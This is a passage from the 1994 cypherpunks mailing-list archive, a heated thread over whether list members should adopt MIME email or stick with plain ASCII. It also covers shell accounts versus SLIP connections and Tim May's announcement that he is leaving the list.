near good enough. The developing easier tools is important, and if anyone wants to discuss how to do this, I'm certainly interested in it. Like I said, I'm convinced MIME is the answer, but a lot more needs to be said then "MIME is the answer" (like what is meant by my phrase "supporting MIME in a rational way"), and I'm also certainly willing to consider the idea that MIME isn't the answer after all. But comments like "well, MIME is completely irrelevant, email will eventually disappear in favor the web," or similar stuff, just leaves me confused, and seems completely irrelevant to me. The issue is making PGP easier to use. If anyone really thinks that the way to do this somehow involves HTTP, then I'd be glad to listen to an explanation of that. But as far as I can tell, whether you are talking about email or ftp or HTTP, the answer is about MIME, and not about those transport protocols. From shamrock at netcom.com Thu Dec 15 22:08:50 1994 From: shamrock at netcom.com (Lucky Green) Date: Thu, 15 Dec 94 22:08:50 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: Tim wrote: >It may be backward, but it is how a huge fraction of the list accesses >the Net. Am I wrong on this? Dial-up access to local POPs is a fact of >life for many, many people. Do a "who cypherpunks" on the list and >look at the sites. Many will be dial-ups, others will be access to >university machines, via dial-ups, etc. Others will be a mix of >corporate machines, some with better connectivity than others, and >many with proprietary e-mail systems, such as VAXMail and the like. My >guess is that fewer than 20% of the list are directly SLIP- or >PPP-connected, with good access to the tools praised here by Amanda, >Perry, you, and others. I have the same type of shell account with Netcom that you have. However, thanks to The Internet Adapter I turned that shell account into a SLIP connection. If you have a shell account, you can convert it into a SLIP account. It is as simple as that. Not that it mattered much for MIME email. Eudora can handle that via dial-up just as well. Sure helps for browsers, though. Accessing the web through Lynx is a joke. Even if you have image loading turned off in the browser to conserve bandwidth, _anything_ is better than Lynx. >It might be a good idea to get some real statistics on this. We did >this a couple of years ago, and there was talk about doing it again. > >For reasons I just addressed in another post, I foresee being on a >dial-up (not a SLIP or PPP, that is) for a while. And I have relatively >few complaints about it. My service provider keeps the 9446 current >newsgroups, provides ftp and suchlike tools, and I don't have to be a >sysadmin. Frankly, if I have to choose between not being able to see >someone's MIMEd GIF and becoming a Unix sysadmin for my own site, I'll >skip the GIFs. Perhaps we can find some common ground here. You don't want to have to use UNIX. You like your Mac, don't you? So why interact with a lousy terminal server if you can do all the things you can do there - and more - the Mac way? Think about it. All the benefits of a Mac interface without giving up the benefits you get from Netcom. (No, I don't work for TIA. I am just a VERY satisfied customer.) >Even Perry admits to using emacs, and Unix mailers like elm are not >exactly oxen. (I have a choice of several mailers, the usual ones. Big >deal.) I also have commercial Eudora, the PowerMac version no less, so >my offline mailer is adequate. This still doesn't mean non-ASCII >(graphics, fancy fonts, equations) can be plausible placed in >messages--and communicated to the list for reading/viewing. Any of the mailers that you can use on a shell are oxen. Anything that can be used over a VT100 emulator is an oxen. (At least where non-ASCII display data is concerned). >I'd like to see some evidence that I am one of the last of my tribe. > >Call me Ishi. You are fighting a lost cause and you know it. VT100 is dead. No, you are not the last of your tribe. I should hope that you have the good sense to come around before that happens. All your friends here sure hope for it. -- Lucky Green PGP encrypted mail preferred. From foodie at netcom.com Thu Dec 15 22:09:59 1994 From: foodie at netcom.com (Bryna And Jamie) Date: Thu, 15 Dec 94 22:09:59 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) Message-ID: At 9:24 PM 12/15/94, Alex Strasheim wrote: >As influential as Tim is, it doesn't matter whether he embraces MIME or >not. If he converted tonight, there'd still be millions of people who >feel the way he felt this morning. Getting Tim to capitulate isn't going >to solve the problem. Thank you, Alex. Can we give this one up yet? Pretty please? In any case, this is making the very recent "Can't we all get along?" posts amusing (*please*, don't nobody think that's a flame). -j -- On the internet, nobody knows you're a deity. __________________________________________________________ foodie at netcom.com From mccoy at io.com Thu Dec 15 22:24:19 1994 From: mccoy at io.com (Jim McCoy) Date: Thu, 15 Dec 94 22:24:19 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) In-Reply-To: Message-ID: <199412160624.AAA10990@pentagon.io.com> > From: foodie at netcom.com (Bryna And Jamie) [...] > Can we give this one up yet? Pretty please? Definitely. It was a strange sort of ego trip to have 10 messages an hour proclaiming "McCoy is Right!" in the subject line, but it is beginning to get a little too wierd for my tastes... :) jim From unicorn at access.digex.net Thu Dec 15 22:41:11 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Thu, 15 Dec 94 22:41:11 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: Message-ID: On Thu, 15 Dec 1994, Lucky Green wrote: > Tim wrote: > > >It may be backward, but it is how a huge fraction of the list accesses > >the Net. Am I wrong on this? Dial-up access to local POPs is a fact of > >life for many, many people. [...] > >guess is that fewer than 20% of the list are directly SLIP- or > >PPP-connected, with good access to the tools praised here by Amanda, > >Perry, you, and others. > > I have the same type of shell account with Netcom that you have. However, > thanks to The Internet Adapter I turned that shell account into a SLIP > connection. If you have a shell account, you can convert it into a SLIP > account. It is as simple as that. Not that it mattered much for MIME email. > Eudora can handle that via dial-up just as well. Sure helps for browsers, > though. Accessing the web through Lynx is a joke. Even if you have image > loading turned off in the browser to conserve bandwidth, _anything_ is > better than Lynx. So, I'm running a Mac //cx with a shell account at the moment. I have a lowly 14.4k connection. What solution do you have for the user who has no direct connection to the net, has merely a modem speed bandwidth, and is in a non-isdn area? I often need to pull large files over 3 megs into my shell account at high speeds. (60-100 kb/sec) Impossible with SLIP. Are you telling me that I can do this and still have the advantage of SLIP? Forgive my ignorance, but you'll have to enlighten me. > > > >For reasons I just addressed in another post, I foresee being on a > >dial-up (not a SLIP or PPP, that is) for a while. And I have relatively > >few complaints about it. My service provider keeps the 9446 current > >newsgroups, provides ftp and suchlike tools, and I don't have to be a > >sysadmin. Frankly, if I have to choose between not being able to see > >someone's MIMEd GIF and becoming a Unix sysadmin for my own site, I'll > >skip the GIFs. Same balance for me when it comes to the transfer rate. > > Perhaps we can find some common ground here. You don't want to have to use > UNIX. You like your Mac, don't you? So why interact with a lousy terminal > server if you can do all the things you can do there - and more - the Mac > way? Think about it. All the benefits of a Mac interface without giving up > the benefits you get from Netcom. (No, I don't work for TIA. I am just a > VERY satisfied customer.) > So how much am I expected to "shell out" ? > > >I'd like to see some evidence that I am one of the last of my tribe. > > > >Call me Ishi. > Sorry Tim, I'm with you. You're not alone yet. > You are fighting a lost cause and you know it. VT100 is dead. No, you are > not the last of your tribe. I should hope that you have the good sense to > come around before that happens. All your friends here sure hope for it. > I'll come around when I'm sure I'm not losing anything. Convince me. > > -- Lucky Green > PGP encrypted mail preferred. > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From anonymous-remailer at shell.portal.com Thu Dec 15 22:46:04 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 15 Dec 94 22:46:04 PST Subject: MIME Message-ID: <199412160645.WAA10144@jobe.shell.portal.com> Fellow Mime-punks, Perry said: > Naturally the idea is old -- I explicitly mentioned NeXT mail, > didn't I? The point is that this is an open, non-proprietary, and > STANDARDIZED framework for doing arbitrary recursive encapsulation of > data in EMail. Well, if "open, non-proprietary, and STANDARDIZED frameworks" are always going to lag behind by several years, then I say the general population will be better off by having entities such as Microsoft or ETH decree their own "standards" and let the market decide to follow them, or be niche players and imitate them. Maybe I have yet to see the value of MIME, especially on mailing lists such as this one. So far I've just seen hundreds of messages about how cool it will be, one MIME encapsulated gif signature, one screwed up MIME post, several "faux MIME" ascii messages (definitely no multimedia extensions, just ascii). Lots of exhortation on how it would be in my best interest to spend hours to upgrade to MIME compatible readers so I can read the same mail I get now, plus the 0.01% MIME messages that drift through (none of which exhibit the superior features MIME allows). I think the point Tim is making is that at the current time, our lives are not made easier or enriched by "MIME". If I want point and click spreadsheet opening, I can use other systems that have worked for 5 years or more, with apps that are already configured and easier to use. From lmccarth at ducie.cs.umass.edu Thu Dec 15 22:51:08 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 15 Dec 94 22:51:08 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) Message-ID: <199412160656.BAA12137@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Jim "you don't have a fucking clue" McCoy writes: > Definitely. It was a strange sort of ego trip to have 10 messages an hour > proclaiming "McCoy is Right!" in the subject line, but it is beginning to > get a little too wierd for my tastes... :) How very convenient for you to say that now, several dozen messages after I observed that the list really _didn't_ need to revive this dumb flamewar. Thanks so much. Yours in disgust, L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvE4sGf7YYibNzjpAQHuMwP+JA6Ec1zIzKrFV7xO0NEnq99hZWDYACQZ fWVXf4d6LqZWjv6sjpXdc3vjCz9PxdyRe50lhkYNWlfB+Yjx/+Ny92A6tk6XagoI 0Gr7BinZSZkMrX1I2GrwEwFbAFt4fSt5p/KbCmepP2IJF79+pU5IHxfyS1/mIwgA w7y3zuiPL7I= =0INf - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvE58ioZzwIn1bdtAQErhgF7BcNdKtCUAjN7PpE5v3pff2dndv6BND44 yEG+NKZVbhF9GccWLU7E2wTU0ThuGT04 =zJ4m -----END PGP SIGNATURE----- From tcmay at netcom.com Thu Dec 15 22:56:36 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 22:56:36 PST Subject: Tim May the Luddite--His Last Message for A While In-Reply-To: <199412160506.XAA25917@pentagon.io.com> Message-ID: <199412160654.WAA02983@netcom15.netcom.com> It may be time for me to move on. More than 2 years on this list, since the B.C. period, may be too long. I'm fed up with fighting these battles, and no doubt many of you are fed up with seeing contentious pitched battles. Cypherpunks is increasingly a forum of strutting and posturing about who has the most powerful tools, who is spending more of their lives staying at the bleeding edge of technology. Depressing. The consensus of the active posters in this latest thread (Perry, Amanda, Lucky, Jim, others) is that I am a hopeless fuddy-duddy, unwilling to begin posting in the latest modality. (Funny, Netnews is still 99.999983% plain ASCII, by message count, and nobody advocating a more advanced scheme is actually _using_ such ne plus ultra formats here on this list. If it's so easy, and so 'punkly correct, why not?) Jim McCoy wrote: > If you are truly interested in making strong encryption easy and > transparent to the vast majority of the users of future communications > systems you should be leading the MIME charge, not holding everyone back... I don't care for this imputation that my views on communicating with the list are somehow holding others back. Or that discussing these issues is inconsistent with being "truly interested in making strong encryption easy and transparent." Bluntly, I'm fucking sick and tired of these cheap shots and personal innuendos. Maybe it's the "young guns" syndrome, with a codger like me whose first Net account was in 1972 being a ripe target for the newest pistoleros with their .486-caliber Linux boxes in their holsters. Whatever, I'm fed up. I'm taking a break and unsubbing for a while. If I'm back in time for the January meeting, we'll have the "Demo Day" as planned. If not, you'll have to play it by ear. As they say, you know what a Cypherpunks firing squad is? A circle. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From lmccarth at ducie.cs.umass.edu Thu Dec 15 22:57:28 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 15 Dec 94 22:57:28 PST Subject: "Any of the mailers that you can use on a shell are oxen" Message-ID: <199412160702.CAA12222@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Lucky Green writes: > Any of the mailers that you can use on a shell are oxen. So after my dept. tosses all its DECstations in the dumpster tomorrow, following your advice, what OS should the new machines support ? System 7 ? AmigaDOS ? VMS ? Windows 95 ? What's the fabulous alternative to Unix about which I've inexplicably missed hearing ? - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvE6S2f7YYibNzjpAQGt3AQAoMajNodKjF20aCsXqXfrqmeVML6RH6nG PbN/wAF5u9zlqfwbsjg74PaWoh5PqyWIH5cQXfaiqRJNkGww0Z2hkKgJNHg+zyCH qJZY8d0iJflEo7CTqxoI7uEKseGrnzIJ0nb38R/rd3CtLzb5rw8ltJ6NPaflYYO+ 3ea/xwQgGmE= =Nlqf - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvE7cioZzwIn1bdtAQEK3AGAjMhfsbT/32Ejb+NVC29w92OaGiHjKzez fqsKNblAcUlyESHgJ1X0xDCeglpbo6JP =ObL3 -----END PGP SIGNATURE----- From anonymous-remailer at replay.com Thu Dec 15 23:03:34 1994 From: anonymous-remailer at replay.com (Name withheld on request) Date: Thu, 15 Dec 94 23:03:34 PST Subject: mime ad naseum Message-ID: <199412160705.AA04013@xs1.xs4all.nl> Many people don't have mime mailers, and if you want to talk to them, you can't use mime features. You can tell them that they're stupid not to have better software or accounts, but until getting PPP running is as easy as installing the aol client, you'll just be pissing in the wind. You don't know it but you are. Is this list supposed to convey ideas or demonstrate the latest email standards? I'm not sure the two goals are compatible. From mccoy at io.com Thu Dec 15 23:09:15 1994 From: mccoy at io.com (Jim McCoy) Date: Thu, 15 Dec 94 23:09:15 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) In-Reply-To: <199412160656.BAA12137@bb.hks.net> Message-ID: <199412160709.BAA20011@pentagon.io.com> "L. McCarthy" writes: > > Jim "you don't have a fucking clue" McCoy writes: A position to which I still agree on this particular issue. Perhaps not stated as diplomatically as Perry did, but so be it... > > [lets drop the MIME discussion...] > > How very convenient for you to say that now, several dozen messages after I > observed that the list really _didn't_ need to revive this dumb flamewar. Actually this "dump flamewar" has produced some good discussion regarding actual implementation issues. Everything that has happened with MIME will happen again when people try to add cryptography to the structure of the net. Maybe there are some lessons to be learned here. ObCrypto: Does anyone know if a ref implementation of the Eastlake and Kaufman DNS extensions exists? Before I dig into BIND I am hoping that there might be code out there already.... jim From lmccarth at ducie.cs.umass.edu Thu Dec 15 23:12:17 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 15 Dec 94 23:12:17 PST Subject: MIME acceptance test--where's the break-even point? Message-ID: <199412160717.CAA12325@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- If you can't beat `em, join `em -- hence I wade into the fray.... Amanda Walker writes: >To: cypherpunks at toad.com >Subject: MIME acceptance test--where's the break-even point? >Content-Disposition: Inline > > >This message contains 'text/enriched'-format data. >Do you want to view it using the 'cat' command (y/n) [y] ? Yeah, I'm sure that'll help a lot.... [...] > This message, for example, is formatted as text/enriched fixed> instead of text/plain. It's still readable on > 80-column ASCII terminals. It's got some extra > stuff, but so does every PGP-signed message, or > worse yet a PEM-signed message, and I would argue > that the MIME formatting itself is no more > objectionable than these, just as I would argue that base64 fixed> encoding (the format that graphics generally appear in when > MIME encapsulated) BTW, is that what that piece of obscura from Peter Cassidy the other day was supposed to be ? > is no more objectionable than > other mechanisms that serve the same purpose, such as PGP smaller> "ASCII armor", uuencoding, etc. [...] > Do you find this message to be "out of bounds" the way you found > my (intentionally excessive) GIF signature from a > while back to be? Yes and no. The .GIF you sent before caused my copy of elm to dump core, which was disconcerting but easy to remedy. I doubted that the picture you'd sent was worth viewing, so I didn't bother trying to view it with xv on my own. This message didn't prompt any error messages from elm, but it was a nightmare to read, thanks to the plethora of angle-bracketed font instructions embedded throughout the text. > If so, where's the boundary between this message and > the innumerable PGP formatted messages we see come by > on this list? The PGP-formatted messages don't cause my mailer to dump core, and don't have any embedded command sequences in their bodies, so I don't go cross-eyed trying to read them. That's a pretty clear line for me. YMMV. > How far are we willing to inconvenience the least common denominator > in order to provide the services we want (whether those services > be authentication & encryption, multimedia content, or anything > else)? Where to the cost and benefit curves cross? Actually, I wish you'd send a full test suite of MIME messages to the list, so I could compile a comprehensive list of the things I have to ask the tech support people here to fix. My copy of elm proclaims itself to be MIME-aware but hasn't done very well in practice. Another GIF enclosure would be handy, because I didn't keep the previous one. - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvE9zGf7YYibNzjpAQHUHwP/UAyrTWjxiZDQBeSOL8cTCQ8xjM+lpsCN doALb8TtJCrypS0ihZzCZ6VpDi9E/JxKPF9lnLXqzCH0LVua3j0eiNXz7TCVfFP6 clziWY9RExiTRfREC8aphNw2XRVetjfhRIOsiBj7lSqNodKnN5GS2sUEDtIBNMdL EMfHAGIWTnU= =LxLk - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvE+8SoZzwIn1bdtAQErRQF+OLFnCDXeznWHQws8LkxatRgaf6+F1ZuK N5e9/i52pI1gNQ4MQL5kEyWzXdH0XmMM =LceU -----END PGP SIGNATURE----- From anonymous-remailer at shell.portal.com Thu Dec 15 23:14:17 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 15 Dec 94 23:14:17 PST Subject: Amanda and MIME Message-ID: <199412160714.XAA12540@jobe.shell.portal.com> Amanda wrote an interesting post. I think if we only use MIME, the quality of discussion on the list would skyrocket. Eric, you should block all non-MIME posts to the list. How could we have been so blind? I've come to rethink my position on MIME. It is definitely the savior. After all, this formatting just has some extra stuff which should be to hard to read around. Heck, I'm sure this is so legible to everybody I may launch into a mathematical explanation of various public key cryptography protocols. Maybe even a few dining cryptographers diagrams. I think the MIME backers should do something that makes me want MIME. Start posting such crucial diagrams and interesting formatted documents, so that I feel like I'm losing something by not going to MIME immediately. I haven't really seen how MIME will enrich the discussion (and I use that term loosely) here. Crap like including a gif/jpeg of myself with each post isn't exactly compelling. From jamesd at netcom.com Thu Dec 15 23:14:40 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 15 Dec 94 23:14:40 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152119.NAA07643@netcom2.netcom.com> Message-ID: Timothy C. May wrote:B > My main point is that the most compelling strategy seems to be to > stick with ASCII for a while, avoid minor-but-painful gains with > Postscript, Acrobat, Replica, TeX, FrameViewer, etc., and then jump to > the Web/html/http/blah blah when the time is right. I have noticed that folks with a Unix background have a rather higher tolerance for stuff that sort of works, most of the time, if you fiddle enough, than folks with Dos/Windows/Mac background I suspect brain damage caused by a "make" utility that treats spaces as semanticly different from tabs. AAargh! :-) (But I am not an operating system bigot, I will freely admit that segments and REPE CMPS have led to disturbing mental symptoms amongst us PC folk.) But seriously folks, GUI tools for manipulating and communicating information are just wonderfully superior. MIME etc provides a standard for such things. Problem is of course that it does not yet provide an entirely satisfactory reality. The standard is not yet standard. Which is why you are probably reading this in a monospaced font with hard carriage returns, rather than the proportionally spaced font and soft line breaks that you get in the WWW --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From shamrock at netcom.com Thu Dec 15 23:25:36 1994 From: shamrock at netcom.com (Lucky Green) Date: Thu, 15 Dec 94 23:25:36 PST Subject: SLIP [Was: McCoy is Right! New Mail Format to Start Now.] Message-ID: Black Unicorn wrote: >So, I'm running a Mac //cx with a shell account at the moment. I have a >lowly 14.4k connection. All I got is 9600. >What solution do you have for the user who has no direct connection to >the net, has merely a modem speed bandwidth, and is in a non-isdn area? > >I often need to pull large files over 3 megs into my shell account at >high speeds. (60-100 kb/sec) Impossible with SLIP. Well, perhaps I can interested you in QuickNet (16MEGAbps, thats an Ethernet, two video channels and several phonelines, all running over the very same 4 wires that are already in your wall) but in order for that to become available, you have to help convince Congress that local telco de-regulation is a Good Thing. Seriously, how do you get 100 kbps over a 14.4 kbps line? Even with the best compression you won't get that kind of throughput. >Are you telling me that I can do this and still have the advantage of SLIP? Whatever througput rate you get from the shell, you can get via SLIP. >Forgive my ignorance, but you'll have to enlighten me. Gladly :-) >> > >> >For reasons I just addressed in another post, I foresee being on a >> >dial-up (not a SLIP or PPP, that is) for a while. And I have relatively >> >few complaints about it. My service provider keeps the 9446 current >> >newsgroups, provides ftp and suchlike tools, and I don't have to be a >> >sysadmin. Frankly, if I have to choose between not being able to see >> >someone's MIMEd GIF and becoming a Unix sysadmin for my own site, I'll >> >skip the GIFs. > >Same balance for me when it comes to the transfer rate. Lets assume for a moment that you get much faster throughput by zmodem'ing a file from the shell than by ftp'ing it via SLIP (some users have reported that zmodem from the shell is faster than ftp, but the differece is marginal at best. I have never been able to verify the claim.) Having tia on your shell account doesn't affect your ability to use the shell in any way. If you are so inclined, you can still download files from the shell as you did before. You can also turn the shell into a SLIP connection with in seconds. Nothing lost, plenty gained. [...] >So how much am I expected to "shell out" ? You don't have to shell out at all. If you ever need to use the shell (to change your .profile, .plan, password, etc) you can just telnet to your account. I usually just hang up and call via the terminal emulator the one time per month I do that, but there really is not need to do so. >I'll come around when I'm sure I'm not losing anything. > >Convince me. As for MIME, which started this tread, no SLIP is needed, There are several dial-up mailers that handle MIME just fine. As for SLIP, in many areas it has become as cheap as a shell account. In San Francisco, SLIP is cheaper than a shell account ($15/month flat rate). For those with an overpriced local SLIP provider, or those who also want a shell there is TIA. Convinced? -- Lucky Green PGP encrypted mail preferred. From jamesd at netcom.com Thu Dec 15 23:25:39 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 15 Dec 94 23:25:39 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412160310.TAA23794@netcom10.netcom.com> Message-ID: On Thu, 15 Dec 1994, Timothy C. May wrote: > -- Netcom doesn't give me a convenient way to bypass the dial-up > terminal emulators (PPP and SLIP are no longer offered by Netcom) Use TIA > The comments here about Sun and Microsoft > not properly--or at all--supporting MIME tell us that it's not real > likely that most folks here will be sending spreadsheets out to the > list readers and attaching GIFs anytime soon. No great loss, either. Very true. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From lmccarth at ducie.cs.umass.edu Thu Dec 15 23:37:47 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 15 Dec 94 23:37:47 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) Message-ID: <199412160742.CAA12589@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- [Please don't cc: me on messages to the list. Thanks.] Jim McCoy writes: > Actually this "dump flamewar" has produced some good discussion regarding > actual implementation issues. I beg to differ. If you think that was a good discussion, I'd hate to see what you'd classify as a bad discussion. Crypto relevance was minimal, too. > Everything that has happened with MIME will happen again when people try to > add cryptography to the structure of the net. It seems to me that people are *already* trying to add cryptography to the structure of the net, and that would actually be worth discussing. > Maybe there are some lessons to be learned here. _Maybe_, but I don't think anyone's learning them. - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvFDrGf7YYibNzjpAQFjXgP/QrsprjIVwZvAmkx8GAySAiEn7/VLtbuL HfvPXaEBvq1iDr5Jax7p95ctWA6Qjo4H13LkUJIHkoMK+Hh5ofO6bG1g2ZBKWz8b oX/S90pPhDDDc4yt6DPQXeaz57yA3IYYhUQzWrh9dH/LtAC5agsyqcJTGTWWrQ1/ pO7d7VQhFnQ= =uE/d - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvFE0yoZzwIn1bdtAQFQKwF/ROSbeuwJYgPTq8WJz3FQLVR9PEA99bBF xxz4ISjLTvZKPPX8OQo2vE6cYgt3mChU =Ahuo -----END PGP SIGNATURE----- From jamesd at netcom.com Thu Dec 15 23:41:37 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 15 Dec 94 23:41:37 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: Message-ID: On Fri, 16 Dec 1994, Jonathan Rochkind wrote: > MIME has nothing to do with annoying messages on your screen, and a > reasonable mailer wouldn't give you those messages. That will be a good argument when we have reasonable mailers. It is not a good argument today. You are using the wrong tense: You should not say "MIME is great". You should say "MIME *will be* great". --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From lmccarth at ducie.cs.umass.edu Thu Dec 15 23:46:34 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 15 Dec 94 23:46:34 PST Subject: Remailers and Keyservers, active ones? Message-ID: <199412160751.CAA12686@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Derek Atkins writes: > The active remailers get periodically posted. I forget the site > where you can request the current list. http://www.cs.berkeley.edu/~raph/remailer-list.html is the best source I know. For the WWW-deprived: finger remailer-list at kiwi.cs.berkeley.edu I'm not aware of a way to obtain the list purely via email; maybe I should establish a way to do that if it's not out there.... - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvFFv2f7YYibNzjpAQFE3AP/blHKIhZTLOOEV+flzL/WFGXMsdTmO2xV GuAZ9P/WCfkMM3x46D+glH7GaLGuGvIMIV09XrvEsvppJ2H4PCMAF1ZhCkLyCDJW VZZTytM4Ws4ffHZzEJ6eyPYqoaKUTgqImj/hRTXIxVRETSlliwWfOJAE6rEAL+Pk RY2vAHoUG2o= =y1dI - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvFG6yoZzwIn1bdtAQHu3QF+JhyYgYqqxBKuGiJA0iDTingK6MZutyHw N89rv2C28/9M0lGc21PJJbW1V5yadOgM =4gy2 -----END PGP SIGNATURE----- From blancw at pylon.com Thu Dec 15 23:52:41 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Thu, 15 Dec 94 23:52:41 PST Subject: Tim May the Luddite--His Last Message for A While Message-ID: <199412160753.XAA02891@deepthought.pylon.com> Responding to msg by Timothy C. May: Whatever, I'm fed up. . . . . As they say, you know what a Cypherpunks firing squad is? A circle. ............................................................. Cheap parting shot: " The record shows I took the blows and did it MYYYYYYYYYYYYYY Waaaaaaaaaaaaay." Blanc (I just had to say that) :>) From shamrock at netcom.com Fri Dec 16 00:14:54 1994 From: shamrock at netcom.com (Lucky Green) Date: Fri, 16 Dec 94 00:14:54 PST Subject: "Any of the mailers that you can use on a shell are oxen" Message-ID: L. Futplex McCarthy wrote: >Lucky Green writes: >> Any of the mailers that you can use on a shell are oxen. > >So after my dept. tosses all its DECstations in the dumpster tomorrow, >following your advice, what OS should the new machines support ? System 7 ? >AmigaDOS ? VMS ? Windows 95 ? What's the fabulous alternative to Unix about >which I've inexplicably missed hearing ? I was afraid of this... I _love_ UNIX. I do not want to see it replaced. What I claim is that 7bit terminals and terminal emulators are a piece of history. My message is that the use of non-ASCII displayable data on the net is growing and that character based terminals are unable to handle the way information will (is) be(ing) presented. UNIX can handle graphics just fine, just VT100 can't. There can be no other lasting solution but to abandon VTwhatever in favor of bitmaped output devices. Since running X over a dial-up connection is rather inefficient, and considering the significant computing power of the PC's that are now being underused as dumb terminals, processing the data locally seems to be a sensible solution. -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Fri Dec 16 00:15:40 1994 From: shamrock at netcom.com (Lucky Green) Date: Fri, 16 Dec 94 00:15:40 PST Subject: Tim May the Luddite--His Last Message for A While Message-ID: Tim wrote: >It may be time for me to move on. More than 2 years on this list, >since the B.C. period, may be too long. > >I'm fed up with fighting these battles, and no doubt many of you are >fed up with seeing contentious pitched battles. Cypherpunks is >increasingly a forum of strutting and posturing about who has the most >powerful tools, who is spending more of their lives staying at the >bleeding edge of technology. Depressing. Nobody is posturing or bragging. Perhaps I should have learned more programming, to help advance the cause, but everybody has their talent and programming isn't mine. Nonetheless, even if you don't like the messagers, listen to the message with an open mind. This is not a flame war. No insults. No critisism of a person. >The consensus of the active posters in this latest thread (Perry, >Amanda, Lucky, Jim, others) is that I am a hopeless fuddy-duddy, >unwilling to begin posting in the latest modality. > >(Funny, Netnews is still 99.999983% plain ASCII, by message count, and >nobody advocating a more advanced scheme is actually _using_ such ne >plus ultra formats here on this list. If it's so easy, and so 'punkly >correct, why not?) If I thought that your were a hopless case and beyond learning, I wouldn't spend so much time posting on this topic. It would be uncalled for to post messages here in MIME. This list is about thought exchange and the type of thought exchange that we do here can be done just fine in ASCII. The same is true for most of netnews. That doesn't mean that a different newsreader wouldn't make it easier on you. Have you ever tried Newswatcher? Have you noticed that the latest software updates posted to USNET are just a mouse click away? Can you honestly say that you don't like Newswatcher better than tin? >Jim McCoy wrote: > >> If you are truly interested in making strong encryption easy and >> transparent to the vast majority of the users of future communications >> systems you should be leading the MIME charge, not holding everyone back... > >I don't care for this imputation that my views on communicating with >the list are somehow holding others back. Or that discussing these >issues is inconsistent with being "truly interested in making strong >encryption easy and transparent." Just different ways of trying to make you see the light. >Bluntly, I'm fucking sick and tired of these cheap shots and personal >innuendos. Maybe it's the "young guns" 